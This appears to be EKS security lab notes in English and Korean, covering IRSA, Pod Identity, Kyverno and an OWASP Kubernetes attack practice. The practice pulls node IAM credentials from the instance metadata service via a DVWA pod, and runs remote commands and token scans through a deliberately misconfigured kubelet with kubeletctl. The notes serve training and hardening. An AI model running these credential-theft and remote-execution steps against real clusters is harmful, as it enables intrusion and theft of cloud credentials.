- mountPath: /var/run/secrets/eks.amazonaws.com/serviceaccount
name: aws-iam-token
readOnly: true
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Never
serviceAccountName: my-sa
terminationGracePeriodSeconds: 0
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: aws-iam-token
projected:
sources:
- serviceAccountToken:
audience: sts.amazonaws.com
expirationSeconds: 86400
path: token
- name: kube-api-access-2c4jv
projected:
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
fieldPath: metadata.namespace
path: namespace
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it eks-iam-test3 -- ls /var/run/secrets/eks.amazonaws.com/serviceaccount
token
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it eks-iam-test3 -- cat /var/run/secrets/eks.amazonaws.com/serviceaccount/token ; echo
eyJhbGciOiJSUzI1NiIsImtpZCI6IjhlY2Y3Y2FkNzhhN...
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# eksctl get iamserviceaccount --cluster $CLUSTER_NAME

NAMESPACE NAME ROLE ARN
default my-sa arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-3-addon-ia-Role1-B9vefeiqjTUD
kube-system aws-lb-controller arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-3-addon-ia-Role1-y3cTEuBKUvir
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]#
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it eks-iam-test3 -- aws sts get-caller-identity --query Arn


"arn:aws:sts::712218945685:assumed-role/eksctl-sigridjin-ekscluster-240413-3-addon-ia-Role1-B9vefeiqjTUD/botocore-session-1713006774"

kubectl exec -it eks-iam-test3 -- aws s3 ls
kubectl exec -it eks-iam-test3 -- aws ec2 describe-instances --region ap-northeast-2
kubectl exec -it eks-iam-test3 -- aws ec2 describe-vpcs --region ap-northeast-2

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod eks-iam-test3 -o json | jq -r '.spec.containers | .[].volumeMounts'

[
{
"mountPath": "/var/run/secrets/kubernetes.io/serviceaccount",
"name": "kube-api-access-2c4jv",
"readOnly": true
},
{
"mountPath": "/var/run/secrets/eks.amazonaws.com/serviceaccount",
"name": "aws-iam-token",
"readOnly": true
}
]
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl api-resources |grep hook

mutatingwebhookconfigurations admissionregistration.k8s.io/v1 false MutatingWebhookConfiguration
validatingwebhookconfigurations admissionregistration.k8s.io/v1 false ValidatingWebhookConfiguration

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl api-resources |grep hook

mutatingwebhookconfigurations admissionregistration.k8s.io/v1 false MutatingWebhookConfiguration
validatingwebhookconfigurations admissionregistration.k8s.io/v1 false ValidatingWebhookConfiguration

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get MutatingWebhookConfiguration

NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 7h59m
kube-prometheus-stack-admission 1 8h
pod-identity-webhook 1 8h
vpc-resource-mutating-webhook 1 8h

# AWS_WEB_IDENTITY_TOKEN_FILE 확인
IAM_TOKEN=$(kubectl exec -it eks-iam-test3 -- cat /var/run/secrets/eks.amazonaws.com/serviceaccount/token)
echo $IAM_TOKEN

It’s important to note that AWS only validates the JWT token and does not ensure consistency between the token file and the actual role specified in the service account. If the IAM role trust policy is not properly configured, it could allow assuming unintended roles using the same token.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod eks-iam-test3 -o json | jq -r '.spec.containers | .[].env'

[
{
"name": "AWS_STS_REGIONAL_ENDPOINTS",
"value": "regional"
},
{
"name": "AWS_DEFAULT_REGION",
"value": "ap-northeast-2"
},
{
"name": "AWS_REGION",
"value": "ap-northeast-2"
},
{
"name": "AWS_ROLE_ARN",
"value": "arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-3-addon-ia-Role1-B9vefeiqjTUD"
},
{
"name": "AWS_WEB_IDENTITY_TOKEN_FILE",
"value": "/var/run/secrets/eks.amazonaws.com/serviceaccount/token"
}
]

Current Limitations of IRSA

  1. The OIDC endpoint is publicly accessible, which can be a security concern.
  2. AWS only verifies the validity of the JWT token but does not ensure consistency between the token file and the actual role specified in the Service Account.
  • If the Condition is not properly set, the same token can be used to assume different roles, as long as the token and role ARN are available.

Introduction of EKS Pod Identity

AWS has simplified the process of granting IAM permissions to individual pods. EKS Pod Identity is implemented as an add-on that deploys a DaemonSet named eks-pod-identity-agent in the kube-system namespace.

This DaemonSet runs on each node in the cluster and is responsible for handling IAM permission requests from pods. By setting hostNetwork: true, the pods in the DaemonSet use the host network instead of the pod network, allowing them to communicate with the AWS IAM service directly.

  1. Check the available versions of the eks-pod-identity-agent add-on using the aws eks describe-addon-versions command.
  2. Install the eks-pod-identity-agent add-on using either aws eks create-addon or eksctl create addon command.
  3. Verify the installation by checking the add-on status with eksctl get addon and the related DaemonSet and pods in the kube-system namespace.
$ ADDON=eks-pod-identity-agent
aws eks describe-addon-versions \
--addon-name $ADDON \
--kubernetes-version 1.28 \
--query "addons[].addonVersions[].[addonVersion, compatibilities[].defaultVersion]" \
--output text
v1.2.0-eksbuild.1
True
v1.1.0-eksbuild.1
False
v1.0.0-eksbuild.1
False

$ aws eks create-addon --cluster-name $CLUSTER_NAME --addon-name eks-pod-identity-agent

eksctl get addon --cluster $CLUSTER_NAME
kubectl -n kube-system get daemonset eks-pod-identity-agent
kubectl -n kube-system get pods -l app.kubernetes.io/name=eks-pod-identity-agent
kubectl get ds -n kube-system eks-pod-identity-agent -o yaml | kubectl neat | yh

containers:
- args:
- --port
- "80"
- --cluster-name
- sigridjin-ekscluster-240413-3
- --probe-port
- "2703"
command:
- /go-runner
- /eks-pod-identity-agent
- server
env:
- name: AWS_REGION
value: ap-northeast-2
image: 602401143452.dkr.ecr.ap-northeast-2.amazonaws.com/eks/eks-pod-identity-agent:0.1.6
imagePullPolicy: Always
livenessProbe:
failureThreshold: 3
httpGet:
host: localhost
path: /healthz
port: probes-port
scheme: HTTP
initialDelaySeconds: 30
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 10
name: eks-pod-identity-agent
ports:
- containerPort: 80
name: proxy
protocol: TCP
- containerPort: 2703
name: probes-port
protocol: TCP
readinessProbe:
failureThreshold: 30
httpGet:
host: localhost
path: /readyz
port: probes-port
scheme: HTTP
initialDelaySeconds: 1
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 10
securityContext:
capabilities:
add:
- CAP_NET_BIND_SERVICE
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
hostNetwork: true
# 네트워크 정보 확인
## EKS Pod Identity Agent uses the hostNetwork of the node and it uses port 80 and port 2703 on a link-local address on the node.
## This address is 169.254.170.23 for IPv4 and [fd00:ec2::23] for IPv6 clusters.
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ss -tnlp | grep eks-pod-identit; echo "-----";done
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ip -c route; done
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ip -c -br -4 addr; done
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ip -c addr; done

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ss -tnlp | grep eks-pod-identit; echo "-----";done
LISTEN 0 4096 127.0.0.1:2703 0.0.0.0:* users:(("eks-pod-identit",pid=166686,fd=4))
LISTEN 0 4096 169.254.170.23:80 0.0.0.0:* users:(("eks-pod-identit",pid=166686,fd=3))
LISTEN 0 4096 [fd00:ec2::23]:80 [::]:* users:(("eks-pod-identit",pid=166686,fd=8))
-----
LISTEN 0 4096 127.0.0.1:2703 0.0.0.0:* users:(("eks-pod-identit",pid=165854,fd=8))
LISTEN 0 4096 169.254.170.23:80 0.0.0.0:* users:(("eks-pod-identit",pid=165854,fd=7))
LISTEN 0 4096 [fd00:ec2::23]:80 [::]:* users:(("eks-pod-identit",pid=165854,fd=6))
-----
LISTEN 0 4096 127.0.0.1:2703 0.0.0.0:* users:(("eks-pod-identit",pid=167313,fd=8))
LISTEN 0 4096 169.254.170.23:80 0.0.0.0:* users:(("eks-pod-identit",pid=167313,fd=3))
LISTEN 0 4096 [fd00:ec2::23]:80 [::]:* users:(("eks-pod-identit",pid=167313,fd=4))
-----

A pod identity association maps a Kubernetes service account to an IAM role. It allows pods using the specified service account to assume the associated IAM role and gain the permissions defined in the attached policy. In this practice, we create an association between the s3-sa service account and the s3-eks-pod-identity-role IAM role, granting read-only access to Amazon S3.

Create a pod identity association using the eksctl create podidentityassociation command, specifying the cluster name, namespace, service account name, role name, and permission policy ARNs.

Verify the created association using eksctl get podidentityassociation and aws eks list-pod-identity-associations.

eksctl create podidentityassociation \
--cluster $CLUSTER_NAME \
--namespace default \
--service-account-name s3-sa \
--role-name s3-eks-pod-identity-role \
--permission-policy-arns arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess \
--region $AWS_REGION

# 확인

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get sa
NAME SECRETS AGE
default 0 8h
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# eksctl get podidentityassociation --cluster $CLUSTER_NAME

ASSOCIATION ARN NAMESPACE SERVICE ACCOUNT NAME IAM ROLE ARN
arn:aws:eks:ap-northeast-2:712218945685:podidentityassociation/sigridjin-ekscluster-240413-3/a-mibij9hipipbfdig4 default s3-sa arn:aws:iam::712218945685:role/s3-eks-pod-identity-role


(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks list-pod-identity-associations --cluster-name $CLUSTER_NAME | jq

{
"associations": [
{
"clusterName": "sigridjin-ekscluster-240413-3",
"namespace": "default",
"serviceAccount": "s3-sa",
"associationArn": "arn:aws:eks:ap-northeast-2:712218945685:podidentityassociation/sigridjin-ekscluster-240413-3/a-mibij9hipipbfdig4",
"associationId": "a-mibij9hipipbfdig4"
}
]
}

# ABAC 지원을 위해 sts:Tagsession 추가
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws iam get-role --query 'Role.AssumeRolePolicyDocument' --role-name s3-eks-pod-identity-role | jq .

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "pods.eks.amazonaws.com"
},
"Action": [
"sts:AssumeRole",
"sts:TagSession"
]
}
]
}

When a pod is created with a service account that has a pod identity association, EKS Pod Identity automatically injects the necessary environment variables and token files into the pod. These include AWS_CONTAINER_CREDENTIALS_FULL_URI, AWS_CONTAINER_AUTHORIZATION_TOKEN_FILE, and region-related variables. The pod can then use these credentials to assume the associated IAM role and access AWS resources accordingly.

  1. Create a service account named s3-sa using kubectl create sa.
  2. Create a pod named eks-pod-identity with the s3-sa service account using the provided YAML configuration.
  3. Verify the pod’s configuration and check the assumed IAM role using kubectl exec.
  4. Test the pod’s access to AWS resources by running AWS CLI commands inside the pod.
kubectl create sa s3-sa

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: eks-pod-identity
spec:
serviceAccountName: s3-sa
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
command: ['sleep', '36000']
restartPolicy: Never
terminationGracePeriodSeconds: 0
EOF

kubectl get pod eks-pod-identity -o yaml | kubectl neat| yh
kubectl exec -it eks-pod-identity -- aws sts get-caller-identity --query Arn
kubectl exec -it eks-pod-identity -- aws s3 ls
kubectl exec -it eks-pod-identity -- env | grep AWS

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it eks-pod-identity -- aws sts get-caller-identity --query Arn
kubectl exec -it eks-pod-identity -- aws s3 ls
kubectl exec -it eks-pod-identity -- env | grep AWS
"arn:aws:sts::712218945685:assumed-role/s3-eks-pod-identity-role/eks-sigridjin--eks-pod-id-c36404b4-b9dc-47b0-a7ea-f2cd5a635462"
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# # 토큰 정보 확인
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it eks-pod-identity -- ls /var/run/secrets/pods.eks.amazonaws.com/serviceaccount/
eks-pod-identity-token

OWASP Kubernetes Top Ten

Let’s go through the practice step by step to understand how a vulnerable Kubernetes pod can be exploited to access the AWS Instance Metadata Service (IMDS) and retrieve sensitive information.

We deploy a vulnerable web application called Damn Vulnerable Web Application (DVWA) using Kubernetes manifests. The manifests include a Secret, ConfigMap, Deployment, and Service for both the DVWA application and a MySQL database.

# CERT_ARN 확인
CERT_ARN=aws acm list-certificates --query 'CertificateSummaryList[].CertificateArn[]' --output text
echo $CERT_ARN

cat <<EOT > mysql.yaml
apiVersion: v1
kind: Secret
metadata:
name: dvwa-secrets
type: Opaque
data:
# s3r00tpa55
ROOT_PASSWORD: czNyMDB0cGE1NQ==
# dvwa
DVWA_USERNAME: ZHZ3YQ==
# p@ssword
DVWA_PASSWORD: cEBzc3dvcmQ=
# dvwa
DVWA_DATABASE: ZHZ3YQ==
---
apiVersion: v1
kind: Service
metadata:
name: dvwa-mysql-service
spec:
selector:
app: dvwa-mysql
tier: backend
ports:
- protocol: TCP
port: 3306
targetPort: 3306
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: dvwa-mysql
spec:
replicas: 1
selector:
matchLabels:
app: dvwa-mysql
tier: backend
template:
metadata:
labels:
app: dvwa-mysql
tier: backend
spec:
containers:
- name: mysql
image: mariadb:10.1
resources:
requests:
cpu: "0.3"
memory: 256Mi
limits:
cpu: "0.3"
memory: 256Mi
ports:
- containerPort: 3306
env:
- name: MYSQL_ROOT_PASSWORD
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: ROOT_PASSWORD
- name: MYSQL_USER
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_USERNAME
- name: MYSQL_PASSWORD
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_PASSWORD
- name: MYSQL_DATABASE
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_DATABASE
EOT
kubectl apply -f mysql.yaml

cat <<EOT > dvwa.yaml
apiVersion: v1
kind: ConfigMap
metadata:
name: dvwa-config
data:
RECAPTCHA_PRIV_KEY: ""
RECAPTCHA_PUB_KEY: ""
SECURITY_LEVEL: "low"
PHPIDS_ENABLED: "0"
PHPIDS_VERBOSE: "1"
PHP_DISPLAY_ERRORS: "1"
---
apiVersion: v1
kind: Service
metadata:
name: dvwa-web-service
spec:
selector:
app: dvwa-web
type: ClusterIP
ports:
- protocol: TCP
port: 80
targetPort: 80
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: dvwa-web
spec:
replicas: 1
selector:
matchLabels:
app: dvwa-web
template:
metadata:
labels:
app: dvwa-web
spec:
containers:
- name: dvwa
image: cytopia/dvwa:php-8.1
ports:
- containerPort: 80
resources:
requests:
cpu: "0.3"
memory: 256Mi
limits:
cpu: "0.3"
memory: 256Mi
env:
- name: RECAPTCHA_PRIV_KEY
valueFrom:
configMapKeyRef:
name: dvwa-config
key: RECAPTCHA_PRIV_KEY
- name: RECAPTCHA_PUB_KEY
valueFrom:
configMapKeyRef:
name: dvwa-config
key: RECAPTCHA_PUB_KEY
- name: SECURITY_LEVEL
valueFrom:
configMapKeyRef:
name: dvwa-config
key: SECURITY_LEVEL
- name: PHPIDS_ENABLED
valueFrom:
configMapKeyRef:
name: dvwa-config
key: PHPIDS_ENABLED
- name: PHPIDS_VERBOSE
valueFrom:
configMapKeyRef:
name: dvwa-config
key: PHPIDS_VERBOSE
- name: PHP_DISPLAY_ERRORS
valueFrom:
configMapKeyRef:
name: dvwa-config
key: PHP_DISPLAY_ERRORS
- name: MYSQL_HOSTNAME
value: dvwa-mysql-service
- name: MYSQL_DATABASE
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_DATABASE
- name: MYSQL_USERNAME
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_USERNAME
- name: MYSQL_PASSWORD
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_PASSWORD
EOT
kubectl apply -f dvwa.yaml

cat <<EOT > dvwa-ingress.yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
annotations:
alb.ingress.kubernetes.io/certificate-arn: $CERT_ARN
alb.ingress.kubernetes.io/group.name: study
alb.ingress.kubernetes.io/listen-ports: '[{"HTTPS":443}, {"HTTP":80}]'
alb.ingress.kubernetes.io/load-balancer-name: myeks-ingress-alb
alb.ingress.kubernetes.io/scheme: internet-facing
alb.ingress.kubernetes.io/ssl-redirect: "443"
alb.ingress.kubernetes.io/success-codes: 200-399
alb.ingress.kubernetes.io/target-type: ip
name: ingress-dvwa
spec:
ingressClassName: alb
rules:
- host: dvwa.$MyDomain
http:
paths:
- backend:
service:
name: dvwa-web-service
port:
number: 80
path: /
pathType: Prefix
EOT
kubectl apply -f dvwa-ingress.yaml
echo -e "DVWA Web https://dvwa.$MyDomain"
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# 8.8.8.8 ; curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
AQAEAH1_MpNsEHXzA1f8b05FN_Wb9jsJq1T-cG5fmKTFXk8_Khslvw==

curl -s -H "X-aws-ec2-metadata-token: AQAEAH1_MpN3DJTXfj6XAujLH2gFWDlekt8Cji-kWV3VU2Iyfw4gEA==" –v http://169.254.169.254/latest/meta-data/iam/security-credentials/

eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR

curl -s -H "X-aws-ec2-metadata-token: AQAEAH1_MpN3DJTXfj6XAujLH2gFWDlekt8Cji-kWV3VU2Iyfw4gEA==" –v http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
ssh ec2-user@$N1 cat /etc/kubernetes/kubelet/kubelet-config.json | jq
ssh ec2-user@$N1 cat /var/lib/kubelet/kubeconfig | yh

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# ssh ec2-user@$N1 sudo ss -tnlp | grep kubelet
LISTEN 0 4096 127.0.0.1:10248 0.0.0.0:* users:(("kubelet",pid=3028,fd=16))
LISTEN 0 4096 *:10250 *:* users:(("kubelet",pid=3028,fd=12)) *:* users:(("kubelet",pid=2940,fd=21))

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: myawscli
spec:
#serviceAccountName: my-sa
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
command: ['sleep', '36000']
restartPolicy: Never
terminationGracePeriodSeconds: 0
EOF

# 파드 사용
kubectl exec -it myawscli -- aws sts get-caller-identity --query Arn
kubectl exec -it myawscli -- aws s3 ls
kubectl exec -it myawscli -- aws ec2 describe-instances --region ap-northeast-2 --output table --no-cli-pager
kubectl exec -it myawscli -- aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager

To mitigate this vulnerability, ensure that your Kubernetes pods are properly secured and do not allow arbitrary command execution. Implement strict pod security policies, limit network access to the IMDS, and use IAM roles with least privilege permissions.

Additionally, consider enabling IMDSv2 and disabling IMDSv1 on your EC2 instances to further enhance security.

Let’s go through the practice of exploiting a misconfigured kubelet step by step using kubeletctl.

We need to install kubeletctl, a tool that allows us to interact with the kubelet API. Run the following commands on your second bastion host (myeks-bastion-2):

# Remove existing kubeconfig (if any)
rm -rf ~/.kube
# Download and install kubeletctl
curl -LO https://github.com/cyberark/kubeletctl/releases/download/v1.11/kubeletctl_linux_amd64 && \
chmod a+x ./kubeletctl_linux_amd64 && \
mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl
# Verify the installation
kubeletctl version
kubeletctl help

Set the IP address of your worker node (e.g., Node 1) as an environment variable. Replace `<NODE_IP>` with the internal IP address of your worker node. Use kubeletctl to scan the specified node IP address for the kubelet API.

N1=<NODE_IP>
kubeletctl scan - cidr $N1/32
curl -k https://$N1:10250/pods; echo # kubelet API

If the kubelet API is properly secured, you should receive an “Unauthorized” error. To mock this, modify the kubelet configuration (on the worker node) SSH into the worker node (e.g., Node 1) from your bastion host. Once connected to the worker node, modify the kubelet configuration file (/etc/kubernetes/kubelet/kubelet-config.json) to allow anonymous authentication and always allow authorization.

ssh ec2-user@$N1
sudo vi /etc/kubernetes/kubelet/kubelet-config.json
"authentication": {
"anonymous": {
"enabled": true
}
},
"authorization": {
"mode": "AlwaysAllow"
}

Step 7: Exploit the misconfigured kubelet (from the bastion host)

# 파드 목록 확인
curl -s -k https://$N1:10250/pods | jq

# kubelet-config.json 설정 내용 확인
curl -k https://$N1:10250/configz | jq

# kubeletct 사용
# Return kubelet's configuration
kubeletctl -s $N1 configz | jq

# Get list of pods on the node
kubeletctl -s $N1 pods

# Scans for nodes with opened kubelet API > Scans for for all the tokens in a given Node
kubeletctl -s $N1 scan token

# 단, 아래 실습은 워커노드1에 myawscli 파드가 배포되어 있어야 실습이 가능. 물론 노드2~3에도 kubelet 수정하면 실습 가능함.
# kubelet API로 명령 실행 : <네임스페이스> / <파드명> / <컨테이너명>
curl -k https://$N1:10250/run/default/myawscli/my-aws-cli -d "cmd=aws --version"

# Scans for nodes with opened kubelet API > remote code execution on their containers
kubeletctl -s $N1 scan rce

# Run commands inside a container
kubeletctl -s $N1 exec "/bin/bash" -n default -p myawscli -c my-aws-cli
--------------------------------
export
aws --version
aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager
exit
--------------------------------

# Return resource usage metrics (such as container CPU, memory usage, etc.)
kubeletctl -s $N1 metrics

Kyverno

Kyverno is a policy engine designed for Kubernetes that allows you to enforce and manage policies across your cluster. It provides a powerful and flexible way to define and apply policies using a Kubernetes-native approach. Kyverno supports both mutating and validating admission controllers, enabling you to modify and validate resources before they are created or updated in the cluster.

To get started with Kyverno, you need to install it in your Kubernetes cluster. The installation process may vary depending on your Kubernetes distribution, but typically involves applying Kyverno’s YAML manifests or using a package manager like Helm.

Once installed, you can define Kyverno policies using the ClusterPolicy or Policy resources. These policies are written in YAML and specify the rules, conditions, and actions to be taken. Kyverno automatically detects and enforces these policies across your cluster.

# 설치
# EKS 설치 시 참고 https://kyverno.io/docs/installation/platform-notes/#notes-for-eks-users
# 모니터링 참고 https://kyverno.io/docs/monitoring/
cat << EOF > kyverno-value.yaml
config:
resourceFiltersExcludeNamespaces: [ kube-system ]

admissionController:
serviceMonitor:
enabled: true

backgroundController:
serviceMonitor:
enabled: true

cleanupController:
serviceMonitor:
enabled: true

reportsController:
serviceMonitor:
enabled: true
EOF
kubectl create ns kyverno
helm repo add kyverno https://kyverno.github.io/kyverno/
helm install kyverno kyverno/kyverno --version 3.2.0-rc.3 -f kyverno-value.yaml -n kyverno

# 확인
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get all -n kyverno

NAME READY STATUS RESTARTS AGE
pod/kyverno-admission-controller-69665dff5-pvltv 1/1 Running 0 31s
pod/kyverno-background-controller-56bc88f4dc-m4kp5 1/1 Running 0 31s
pod/kyverno-cleanup-controller-64448c5b4d-fxzks 1/1 Running 0 31s
pod/kyverno-reports-controller-6bbd8f8d4-zjctd 1/1 Running 0 31s

NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
service/kyverno-background-controller-metrics ClusterIP 10.100.145.15 <none> 8000/TCP 31s
service/kyverno-cleanup-controller ClusterIP 10.100.241.190 <none> 443/TCP 31s
service/kyverno-cleanup-controller-metrics ClusterIP 10.100.93.149 <none> 8000/TCP 31s
service/kyverno-reports-controller-metrics ClusterIP 10.100.79.141 <none> 8000/TCP 31s
service/kyverno-svc ClusterIP 10.100.233.172 <none> 443/TCP 31s
service/kyverno-svc-metrics ClusterIP 10.100.232.125 <none> 8000/TCP 31s

NAME READY UP-TO-DATE AVAILABLE AGE
deployment.apps/kyverno-admission-controller 1/1 1 1 31s
deployment.apps/kyverno-background-controller 1/1 1 1 31s
deployment.apps/kyverno-cleanup-controller 1/1 1 1 31s
deployment.apps/kyverno-reports-controller 1/1 1 1 31s

NAME DESIRED CURRENT READY AGE
replicaset.apps/kyverno-admission-controller-69665dff5 1 1 1 31s
replicaset.apps/kyverno-background-controller-56bc88f4dc 1 1 1 31s
replicaset.apps/kyverno-cleanup-controller-64448c5b4d 1 1 1 31s
replicaset.apps/kyverno-reports-controller-6bbd8f8d4 1 1 1 31s

NAME SCHEDULE SUSPEND ACTIVE LAST SCHEDULE AGE
cronjob.batch/kyverno-cleanup-admission-reports */10 * * * * False 0 <none> 31s
cronjob.batch/kyverno-cleanup-cluster-admission-reports */10 * * * * False 0 <none> 31s
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get crd | grep kyverno
admissionreports.kyverno.io 2024-04-13T13:06:08Z
backgroundscanreports.kyverno.io 2024-04-13T13:06:08Z
cleanuppolicies.kyverno.io 2024-04-13T13:06:08Z
clusteradmissionreports.kyverno.io 2024-04-13T13:06:08Z
clusterbackgroundscanreports.kyverno.io 2024-04-13T13:06:08Z
clustercleanuppolicies.kyverno.io 2024-04-13T13:06:08Z
clusterephemeralreports.reports.kyverno.io 2024-04-13T13:06:08Z
clusterpolicies.kyverno.io 2024-04-13T13:06:09Z
ephemeralreports.reports.kyverno.io 2024-04-13T13:06:08Z
globalcontextentries.kyverno.io 2024-04-13T13:06:08Z
policies.kyverno.io 2024-04-13T13:06:09Z
policyexceptions.kyverno.io 2024-04-13T13:06:08Z
updaterequests.kyverno.io 2024-04-13T13:06:08Z
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod,svc -n kyverno
NAME READY STATUS RESTARTS AGE
pod/kyverno-admission-controller-69665dff5-pvltv 1/1 Running 0 33s
pod/kyverno-background-controller-56bc88f4dc-m4kp5 1/1 Running 0 33s
pod/kyverno-cleanup-controller-64448c5b4d-fxzks 1/1 Running 0 33s
pod/kyverno-reports-controller-6bbd8f8d4-zjctd 1/1 Running 0 33s

NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
service/kyverno-background-controller-metrics ClusterIP 10.100.145.15 <none> 8000/TCP 33s
service/kyverno-cleanup-controller ClusterIP 10.100.241.190 <none> 443/TCP 33s
service/kyverno-cleanup-controller-metrics ClusterIP 10.100.93.149 <none> 8000/TCP 33s
service/kyverno-reports-controller-metrics ClusterIP 10.100.79.141 <none> 8000/TCP 33s
service/kyverno-svc ClusterIP 10.100.233.172 <none> 443/TCP 33s
service/kyverno-svc-metrics ClusterIP 10.100.232.125 <none> 8000/TCP 33s

# (참고) 기본 인증서 확인 https://kyverno.io/docs/installation/customization/#default-certificates
# step-cli 설치 https://smallstep.com/docs/step-cli/installation/
wget https://dl.smallstep.com/cli/docs-cli-install/latest/step-cli_amd64.rpm
sudo rpm -i step-cli_amd64.rpm

#
kubectl -n kyverno get secret
kubectl -n kyverno get secret kyverno-svc.kyverno.svc.kyverno-tls-ca -o jsonpath='{.data.tls\.crt}' | base64 -d
kubectl -n kyverno get secret kyverno-svc.kyverno.svc.kyverno-tls-ca -o jsonpath='{.data.tls\.crt}' | base64 -d | step certificate inspect --short
X.509v3 Root CA Certificate (RSA 2048) [Serial: 0]
Subject: *.kyverno.svc
Issuer: *.kyverno.svc
Valid from: 2024-04-07T06:05:52Z
to: 2025-04-07T07:05:52Z

#
kubectl get validatingwebhookconfiguration kyverno-policy-validating-webhook-cfg -o jsonpath='{.webhooks[0].clientConfig.caBundle}' | base64 -d | step certificate inspect --short
X.509v3 Root CA Certificate (RSA 2048) [Serial: 0]
Subject: *.kyverno.svc
Issuer: *.kyverno.svc
Valid from: 2024-04-07T06:05:52Z
to: 2025-04-07T07:05:52Z

validation

  • A Kyverno ClusterPolicy named “require-labels” is created to enforce a validation rule on all pods in the cluster. The purpose of this policy is to ensure that every pod has a label with the key “team”.
# validation
# 모니터링
watch -d kubectl get pod -n kyverno

# ClusterPolicy 적용
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: **ClusterPolicy**
metadata:
name: **require-labels**
spec:
**validationFailureAction: Enforce**
**rules**:
- name: check-team
match:
any:
- resources:
kinds:
- Pod
**validate**:
message: "label 'team' is required"
pattern:
metadata:
labels:
team: "?*"
EOF

# 확인
kubectl get validatingwebhookconfigurations
**kubectl get ClusterPolicy**
